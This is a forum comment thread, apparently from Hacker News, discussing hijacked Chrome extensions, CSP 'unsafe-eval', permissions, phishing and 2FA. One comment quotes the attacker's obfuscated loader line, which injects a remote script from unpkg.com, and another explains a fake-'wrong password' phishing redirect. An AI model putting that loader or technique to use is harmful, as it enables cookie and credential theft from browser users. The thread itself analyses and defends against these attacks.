I am guessing the extensions had a "content_security_policy" key in its manifest, with a 'unsafe-eval' CSP directive in its value?
Any extension which declare such CSP directive in its manifest should be presumed malicious until further thorough investigation proves otherwise.
The 'unsafe-eval' in a manifest is essentially the ability for an extension to execute arbitrary code in the extension context which can't be code-reviewed by reading the source files.
"User-Agent Switcher for Google Chrome" confirmed to have a 'unsafe-eval' in its manifest.
So I guess the suspicion should be extended to any extension declaring a "content_security_policy" key in its manifest.
It would seem obvious that the moment a script tries to load arbitrary code outside of the package, it should fail.
Generated code is code that's outside of the package.
There are also a few (keyword: FEW) valid reasons for using eval in situations where it's beneficial to pull updates and modules from a known and trusted location.
In those cases though, if you're not signing server side and validating signatures in the extension with a pre-shared cert, you've still got problems (single MITM attack can compromise your extension going forward).
Long story short, eval is still a very useful feature. It needs to be used properly, and it should be used rarely, but it's incredibly powerful, and lots of things you don't really think about suddenly stop working if it goes away.
And yet this is Mozilla's stance regarding extensions pulling code from outside the extension's own package:
> extensions with 'unsafe-eval', 'unsafe-inline', remote script, or remote sources in their CSP are not allowed for extensions listed on addons.mozilla.org due to major security issues.
This is the sane stance in my opinion, with the best interests of users at heart.
I would like to be shown an actual, real case of why eval() would be impossible to avoid for an extension, not just a theorized one with no real sensible and convincing example. As much as I try, I can't come up with any such scenario.
I mostly agree with you, eval is dangerous and often improperly used, but it's ALSO an incredible tool.
The complete opposite of your argument is languages that are homoiconic(https://en.wikipedia.org/wiki/Homoiconicity): They're built in a way that explicitly allows manipulation, even of the language itself as a FEATURE.
They include languages like Lisp/Clojure/Julia.
Worse, many of the ways to "work" around the lack of eval just reduce the attack surface, or make the attack considerably less likely (obfuscation not security!).
Simple case: You need to apply certain policies to certain sites, those policies vary based on the browser in use, the country of origin of the user, and the country the site is hosted in.
The way that those policies vary... ALSO varies. As new legislation is passed, or corporate policies change, or certain countries become more or less stable.
A (completely valid) way to solve this problem would be to send both a policy engine and a policy set to the extension. The policy engine is eval'd and runs the policy set.
That allows real-time updates to the deployed extension's ability to parse new policies. Not just different data in the policies, mind you, but actual new policy capabilities.
Do you have to use eval? Nope, sure don't. You can generate a custom ebnf (hell, why not just use the ebnf for ecmascript), write you own freaking engine, and run it. All without eval. But you're still just running eval. You just get to name it nicely to something else, introduce an incredible amount of overhead to recreate a feature someone has already provided, and generally get less performant results.
Or, you can just fucking sign the payload with a pinned cert and verify on the client, and get the same guarantees for security you have with HTTPS to begin with.
1. It's the de-facto language for the web, which both drastically increases the number of inexperienced developers, as well as the total attack surface.
2. Again, as a scripting language for browsers, parsing untrusted user input is a common need. Eval filled the need for parsing, but not the need for trust.
You can absolutely use eval in entirely safe ways. Most people don't, and doing so (especially in JS) is hard. That's because JS has made establishing trust hard. Juuuuust recently, with the introduction of some of the webcrypto work, and the rapid rise of ubiquitous https are we really getting to the point where doing so is really feasible at all.
I'd be OK with grabbing code elsewhere, as long as I could guarantee that it would never change. Primarily, immutability. I'm thinking of something like an IPFS repo which is "elsewhere", but still very much crawl-able, scannable for bad stuff (aside turing issues...), and can be shown to reproduce stuff if it is broken.
Also, using an immutable self-certifying system would also solve the second point, regarding the single MITM. The trust would be with the file/package, and not some ephemeral cert (whos trust is brokered from above).
But there are lots of times when the final result is much more valuable when the code CAN change.
You just have to have trust.
1. Trust that the folks who can change the code aren't malicious.
2. Trust that the code you think you're running is really the code you're running.
Neither of those things are really too much of a stretch. And the services and capabilities they allow are very, very nice.
Hell, statistically speaking... we're both typing these comments in Google Chrome, a browser that auto-updates itself all the time.
but 1. we trust that Google won't suddenly become malicious and 2. we trust the mechanisms in place (https, cert pinning) to ensure the update is really the update Google sent.
In fact, this whole article actually boils down to a breakdown of trust: Turns out random extension devs aren't as trustworthy as we might like. They make mistakes and there's no safety net.
I'm not sure if extensions also have the capability to capture the https body info, but I erred on the safe side and also changed passwords.
Seriously? Who trusts the Chrome store or the Android store for that matter? If you've ever once submitted an app and seen how loose the security is, I can't see how you'd have any faith in their system.
I've seen that somewhere else; is it just for obfuscation? Or is there some other reason for it?
Maybe it might fool some automated analyzers though.
-If string is Base64 encoded
-Output new string
With no recursion for an iterated check of any sort of encoding.
"lkmofgnohbedopheiphabfhfjgkhfcgf" is the identifier for the user-agent extension I've been using for a while, and looking at the code, it's very straightforward and not spying on anything. It has not been updated since 2013 (and the website listed for the dev, www.toolshack.com, is not online), so I'm guessing a lot of users just go with other extensions that have received updates.
BTW, Google itself offers a similar extension at 120KB called "User-Agent Switcher for Chrome" (not "... for Google Chrome") here: https://chrome.google.com/webstore/detail/user-agent-switche...
Is there any way to confirm that this is actually from google though, and not just some 3rd party who chose their publisher name as "google.com"? Most official google extensions have a "by google" badge in the right hand column whereas this one lacks it.
Now, is that trustworthy or not? Good question.
This just has the 'offered by google.com'. I would have assumed a 'By Google' logo would have been added after acquisition?
Of course, forgeable as well.
I've sent an email to his anonymized domain registrant contact to see if he can do anything about his malicious competitor.
So we have a web store that that average Chrome users think is "safe," especially when apps have high review scores, and no meaningful ability to report malware to Google or to the users. Nice.
Case in point, I don't care about a readability or bookmarking plugin reading a news link, but it shouldn't read my bank page.
For example, I made an extension that, upon a certain keyboard shortcut, saves the current page in a specific bookmarks folder. Currently Chrome's permissions model completely fails here, you need to request full access to all user data, everywhere, indefinitely.
Which would be better, (a) granting full indefinite access to the domain you're bookmarking most of the time you bookmark something, or (b) giving the extension permission only to see the current tab's URL and title, and to edit one specific bookmarks folder, and only during a keyboard shortcut's callback?
The granularity solution to your scenario would be to tie page-reading permissions to your triggering the extension, and have them removed with code execution end. So, now you don't need to worry about sensitive information that shows up on other domains, or your bank deciding to use a subdomain, or that one bank blog post that you actually do want it to see.
It requires a "deliberate, explicit user action" to run the extension on the page each time even if it asks for that permission. And if you really do want an extension enabled 24/7 (such as vimium), then you can select a check box in the extensions page which allows the extension to run without specifically enabling it each time.
Side note: Chrome appears to have moved Extensions out of Settings since I last looked, and the "search settings" bar doesn't bring it up either. Took me a few minutes to find how to get to them.
AIUI that's a consequence of the Chrome extension security model. How could a bulk-downloader extension download files from arbitrary web sites without "Read[ing] data from all websites"?
Compare that to Firefox's model (at least, the old XUL model), where every extension essentially runs as the Firefox equivalent of "root".
But by making nearly every extension sound evil, even the ones that aren't, users get used to accepting every permission request, or not installing any extensions at all.
IMO the danger is worse with Chrome. At least with Firefox, you know that every extension can potentially be malicious. With Chrome, what happens is, you install an extension that has nice-sounding permissions. Then 3 months later, it gets sold to an ad/malware company, they push out a new version that reports every URL you visit to their server, and you see a popup saying that some extension needs more permissions. Maybe you notice it, maybe you think nothing of it--or maybe the browser window steals focus while you're typing and the OK button gets pressed without your even realizing it.
What I was hoping for was something along the lines of "<Download Extension> wants to access this page" (similar to the notification when a website tries to access your location) upon use. I've no idea if that's possible or not in the Chrome security model.
What we really, really need is the ability to jail (and tie to a different IP) a browser instance.
I want this so much that I am somewhat seriously considering learning the syntax of the vmware fusion command line tool so that I can quickly fire up a browser VM with just a command (and revert state to "clean" snapshot, etc.).
The problem, of course, is that this use-case is so compelling that in a short amount of time I would have 5 or 6 browser VMs running and now I am running out of memory ... it's silly to fire up an entire virtual machine just to run the browser.
However, the existing sandbox measures are not nearly enough. I want to do my banking from a different IP than I use google services from. Every day I want to wipe that OS to clean state and start over.
This is not an easy configuration. Even with an OS (FreeBSD, Solaris) that has jail it's not simple to locally interact with a GUI tool on your existing desktop that is actually in its own jail ...
First, it is excellent that you disclosed the issue.
Second, based upon the quoted text you really aren't accepting responsibility for having been phished. The team member wasn't "unlucky." Your "radar" shouldn't trick you into thinking you won't be attacked.
Fix the process, not the people.
It's good that they're not throwing the poor person under the bus.
I agree with you. The email makes the situation appear as a process issue. Based upon the disclosure text, it seems quite possible the person wouldn't normally have clicked on an email text, but did so here based upon process.
The disclosure displayed the attitude that they shouldn't have expected to get phished. It's 2017. Lots of people get phished.
It's pretty straightforward to never click links that arrive in emails, to never enter passwords into webpages that open on their own.
Of course there are technical ways to mitigate this specific attack, but it is more important not to excuse poor Internet hygiene after the fact.
Characterizing the act as "unlucky" is excusing language, just as bad as blaming language.
Assigning an error to mystical forces is unhelpful.
Simply stating that the person entered the password into a phishing site is not blaming language, it is factual.
The only real defense is to glance at the url bar every time you're about to enter your password. And even I find myself not doing that 100% of the time. It's a numbers game.
A policy of popping up a popup "glance at url bar" every time you copy your password from your password manager (which you're using, right?) would go a long way.
With Google specifically, the worst part is you really do have to look at the URL every single time you go to enter your password. And by that I mean that if you land on the login page, verify the URL, enter your password, submit, and get the error page saying you got the password wrong... you must check the URL again before re-entering your password.
Why? Because Google's login, by design - and repeatedly defended by them as being "acceptable" - allows redirecting off Google's properties after login. So hackers send you to the real Google login page, with a post-login redirect to a fake but perfect copy of the "wrong password, try again" page, where they then capture the passwords of people who mindlessly re-enter their password without double checking the URL a second time.
Most importantly, 2FA does not help you here. You'll enter a currently valid 2FA code on the hacker's site, and they will immediately use that code to actually log in to your account. Before you realize what is happening, you are already locked out of your account - new password, 2FA stripped or replaced, security questions changed, and all pre-existing sessions/devices wiped.
With i18n not even that: https://www.theguardian.com/technology/2017/apr/19/phishing-...
Benign POC: https://www.xn--80ak6aa92e.com/ (open it and it'll look like a normal "l" in the url box)
Do other password managers not do that?
Just curious, not trying to engage the bigger question of whether getting phished is the user's fault.
It alerts if you enter your google password anywhere but the real google sign in page.
I agree that any defense is far from being perfect, but IT professionals shouldn't fell for an unsofiscated attack like this even if you are no working in security. I am not even talking about a web developer.
Now, there are two ways to deal with the situation. Demonize, or accept. The demonize/blame approach doesn't work.
The article clearly explains that "the bitly link was not directly visible in the phishing email, as it was an HTML-email."
Have I been able to convince a single customer (I run a computer services business) or friend to follow my lead? Nope, not a single one.
No. FIDO hardware 2fa works fine for this.
In my case everything looked normal at a glance. 2FA saved me but if they'd had asked for 2FA I wouldn't have noticed.
Other people getting phished
I'm assuming from your tone of "I demand his head" that you were running the compromised extension, and wish to extract your pound of flesh from the person who compromised you. (EDIT: If not, what's your beef with them? Are you a competitor? Please explain!) This, too, is wrong. And here's why we don't play the blame game when it comes to human failures:
You chose to run a Chrome extension, from an untrusted source, with only machine automation vetting its contents and auto-update ensuring that you get the latest attack. Of course you got compromised. What else did you expect? How could you place ultimate trust for all content in your browser in the hands of an OCR extension?! What on earth could compel you to accept such a ridiculous risk in exchange for this?
Everyone's human, you included. They clearly stated and accepted responsibility for the incident. Now you need to stand up and accept responsibility for running unvetted code in your browser. (EDIT: Yes, it's machine-vetted. How's that working out for you?)
There's more than enough blame to ensure you get an equal portion. Being human is bad enough without people coming to destroy you because they'd rather not confront their own failures of judgement. Get over your immature desire to get your vengeance for being compromised and build a better approach to your own personal security.
If you use a password manager that auto fills in the paswords, it is open to an attack by a site or program that can fool it into thinking you have visited the site.
Any malicious extension such as the one compromised her, has a good chance of being able to drain all your passwords.
You are probably safer, even with phishing threats, to paste it in from another program each time.
I doubt even pasting it in is completely secure.
Why would you click?
I reached out to both services to have it shut down. Hopefully that will at least kill it temporarily.
A similar thing happened with another Chrome extension Social Fixer about a month ago.
EDIT: It's already been blocked, nice work @mjackson
In fact, judging by the exploit code, I would guess the same author, as the Social Fixer attack had a very similar hashed package on Unpkg as well.
In that scenario the author also didn't have 2FA enabled:
I feel like Google should take the next step of requiring all extension developers to enable 2FA before being able to post an extension.
Best comment here
All of the software I use is signed at some point in the chain (be it by the actual author or by the package manager, who'd better be verifying signatures if they're available, otherwise at least not blindly updating), _except for my browser extensions_. Most of it is also _reproducible_! I can get around this for some things---I use GNU Guix in addition to Debian, and they package some extensions. I need to start using them.
Of course, the signature should really come from the actual author, not the package maintainer for a particular distro; there's room for error. In the case of a project being hijacked (e.g. Copyfish), hopefully a maintainer would notice. Git commit and tag signing is an easy way to do this if you don't separately sign releases; package maintainers should be building from source.
In the case of Copyfish: if the browser validated signatures from the authors, then this would have been thwarted.
(Maybe there is some code signing protections in place? I'm not an extension developer for either Chromium or Firefox; please let me know if something does exist!)
Perhaps it was stored somewhere accessible by that account? Or accidentally packaged with the extension itself? If that were the case the spear phishing attack would make sense: someone scraping the Chrome store for extensions that contain a key file, then phishing their developer account credentials would be more efficient than phishing credentials without knowing beforehand whether you'd be able to get the private key and update the extension.
What's concerning to me is the section entitled "Uploading a previously packaged extension to the Chrome Web Store", which asks the user to place the private key into the package's root and include it in a zip. First: why? Why upload the private key? That leaks it to Google and on top of that stores it in multiple places; the user could forget to delete the zip (and do so securely), for example. And the private key in the root is probably a copy, so that has to be shreded too.
For updating the package, you select the project root as well. If you didn't remove your private key before doing so, I'm assuming you'd be releasing your key?
The first was live http headers 
I have never had this experience on Firefox.
Is it simply a matter of Chrome being a bigger target?
I thought the attacker stole the account maliciously, but hadn't quite gotten around to inserting the malware by the time it was taken back.
I had strong suspicions that a certain webhost a new client of mine utilized was both prone to attack, and not very forthcoming when past attacks had occurred.
So when I loaded their own website one day and found it full of ads for russian pornography... I confirmed my own bias that the webhost had been hacked... deleted the account, and moved everything over to AWS.
Changed all the passwords, freaked out a bit, etc...
Then I realized that it was just the extension I was running that injected those ads... d'oh!
Obviously, for sites that support U2F (like Google), getting a YubiKey or any other U2F-compatible key would be the best protection against this.
I think OP agrees with you.
Actually - I disagree with this. You can no longer "glance" at the url bar to determine if you are on the right domain due to Unicode chars if you clicked a link.
The only safe way is to type the url yourself into the browser.
If it is a long link - then at least typing the base domain, and pasting the "rest" is probably safe?
Maybe IE is affected though. I haven't tested every browser. But it's a known security concern.
Why have you got such an old version of Chrome?
To answer your question, (1) it's pretty arduous to install Chrome from the AUR, and (2) I am wary of Google removing useful functionality from Chrome.
i don't get that logic. what's the difference between
Your adwords account was suspended due to suspected click fraud. [bunch of made up plausible reasons]. you may appeal by going to your adwords control panel [phising link here]
Your adwords account was suspended. click here to see why [phising link here].
I think the best defence here is to condition ourselves out of this behaviour. If you receive a link in an email, don't click it - view the source or paste it into a text document and examine it. And if you aren't expecting an email, such as Google emailing out of the blue, go to the known-trusted site and see if there's any pending notifications.
Seems we need to stop trusting email.
Looking at the attacker's code, they are currently trying to steal cloudflare api keys in addition to stealing cookies from all sites the extension users visit :(
Sadly it is a bit overzealous and shows messages with say www.google.com that go to www.google.com/ as malicious too (i.e. trailing / so the text and URL don't exactly match though they resolve to the same thing), but the idea seems sound. I'm surprised gmail doesn't have something like this.
I use this in safari to bring it back: https://visnup.github.io/Minimal-Status-Bar/
> Sigh... totally agree. I could add a longer story why just this account had no 2FA enabled, but the lesson learned is simple: From now on, we enable 2FA for every account that offers it.
So they won't make this mistake again.
This whole 2FA thing has been really jarring for me, because I always treated my phone like a public space: no password, no private data (that I know of), ready for inspection by foreign authorities. Of all the things the world could ask me to trust, why the phone?
Because it's the only instance of a computer that you can expect majority of users to own and always have on them.
2FA as a thing would not get any reasonable adoption if you required people to buy hardware keys to use it. Not to mention, hardware keys do not work on every device one would like to log in from (AFAIK you can't plug in a Yubikey to an Android tablet, and it may not have NFC built in).
Using an USB OTG adapter, it should be possible. However, even the flagship tablets of Samsung don't carry NFC, only the phones do - and even there it's a hit and miss if you have NFC.
Apple, on the other hand, doesn't have developer-accessible NFC anywhere.
This is a real shame.
U2F cannot be phished.
What if I control the user's computer and can let my own code interact with U2F? Or does the protocol somehow prevent that?
So typical, unfortunately.
Instead, Google should generate an emergency disable code that a developer can put into a simple web form from anywhere in the world, even if the developer has been locked out of every one of their accounts, which immediately centrally disables that extension.
How it should work.
1. "revocation code generation" and explanation. Text like: "this is a secret revocation code. Anyone who learns it can immediately disable your extension. Keep it secure and separate from all of your production systems. You will be able to use it even if locked out of all other acccess."
2. A web form people can submit revocation codes to, from anywhere with Internet access.
The code should be very high-entropy and generated by Google. However, it should not have ambiguous characters like 1 and capital I.
I personally would generate it using a dicewords-like wordlist. Also, I personally would ensure it had approximately 384 bits of total entropy of which one third is a recovery checksum.
This enables the developer to write many words down wrong and still be able to disable their extension. In case the recovery record/checksum portion were used, I would offer the user the result "You appeared to have made a mistake which we could correct. Is this the correct disable key?" then show the corrected version.
However, this last idea seems to be beyond the state of cryptography worldwide (i.e. for some reason I have written something that exceeds best practices worldwide, like I'm from the future or something), so I understand if Google's cryptographers don't implement this part.
The above seems a bit grandiose of me so here is the comment where I first wrote about this:
If you want to change that, start contacting reporters from mainstream media. If this hits the New York Times or the Wall Street Journal, or at least Techdirt, Google might notice.
I am not personally an extension developer and don't run many.
It does explain so much. for example all this work was put into a ridiculous, animated, moving, flashing new gmail sign-in page that was pre-announced for weeks (our sign-in page is changing!) and after all that work does not include even seven and a half minutes worth of improvement by a developer. For example, I had to laugh and laugh after I realized it wasn't accepting my password because my caps lock was on.
I would expect a popup warning if you have your caps lock turned on while typing. Because, you know, that is one of literally like 3 things you can do to improve a sign-in page that is that dynamic and moving and flashing. There's just not much to improve.
All that flash and it doesn't do anything at all. Your comment gives a lot of insight as to why so I would like to understand this cultural shift.
how does management work at Google now?
* instant revocation -> attacker will just revoke the code
* delayed revocation where the code remains usable for some period -> accidental exposure is irrecoverable
Maybe it's viable as an option (extension owner takes on the risk of properly managing the secret, knowing it can't be revoked easily).
Revocation codes should revoke. A malicious employee or compromised gmail account should be able to disable an extension, yes. The developer should then have to work to reinstate it.
Extensions are not part of the core Chrome experience.
You are asking: "As a user, are you okay with Chrome extensions being disabled by Google if its developer had their revoke key compromised?"
Nobody would say "no".
Compare: "as a user, are you okay with Microsoft Windows locking and not booting, in case Microsoft's internal revoke key experienced a security issue?" (until Microsoft issues an update which unlocks it again.)
Most people would not want that, because people need to finish working on their things in this scenario. (Of course some ultra secure installations might want that, but most wouldn't.)
The difference is that these are small, third-party developers, working on extensions, not the core functionality.
I hope this answers your question regarding how I personally would handle exposed codes.
However, I am not an extension developer or heavy extension user! I am not saying this is the only solution.
They frequently remove it from the store when people notice and restore it a or so month later.
The comments over the past year or so detail the symptoms of spyware. The "Report Abuse" button in Chrome Store feels useless.
"var config_fragment = '<sc' + 'ript sr' + 'c="ht'+ 'tps://un' + 'p' + 'kg.com/' + hash + '/' + hour + '.js"></sc ' + 'ript>';"
var config_fragment = '<script src="https://unpkg.com/' + hash + '/' + hour + '.js"></script>';
Yeah, but what will you do when your receive an HTML-only mail, or a mail with text/plain alternative saying "lol, get a better MUA", or a mail with text/plain alternative so mangled it can't be read without making your brain hurt?
All these are common occurrences in automatically sent e-mails these days.
Thunderbird does this by default.
And that's exactly what phishers want you to do.
The lesson here is: never trust anyone or anything.
Which is why you should use 2FA and why you shouldn't trust someone who says they don't use it.
I find it interesting that most people who replied to your post were upset with you. The first maxim of programming is, "all input is evil." Good Internet Hygiene means not to click links in emails.
The world is an uphill kind of place.